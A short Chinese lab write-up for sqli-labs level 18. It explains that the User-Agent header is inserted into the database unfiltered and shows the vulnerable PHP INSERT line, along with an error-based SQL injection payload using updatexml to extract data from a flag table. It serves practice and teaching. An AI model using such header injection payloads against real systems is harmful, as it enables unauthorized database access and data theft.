sqli-labs的时候遇到了在ugent处注入的情况,之前没遇到,补充一下,第18关

前面是对uname和passwd用一个方法进行了过滤,过滤了一些符号,不好注入,接着往下看,这里可以发现获取我们的User-Agent并且插入数据库的uagents表中,并且uagent并未过滤

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
·······
echo 'Your User Agent is: ' .$uagent;//同时会echo出来

那么直接利用User-Agent处进行插入报错,注意数据包中登录字段需要使用数据库中存在的umane和passwd,要不然不会显示用户User-Agent

User-Agent: 1',1,updatexml(1,concat(0x0a,(select group_concat(flag) from flag)),1));-- '

uname=admin&passwd=admin&submit=Submit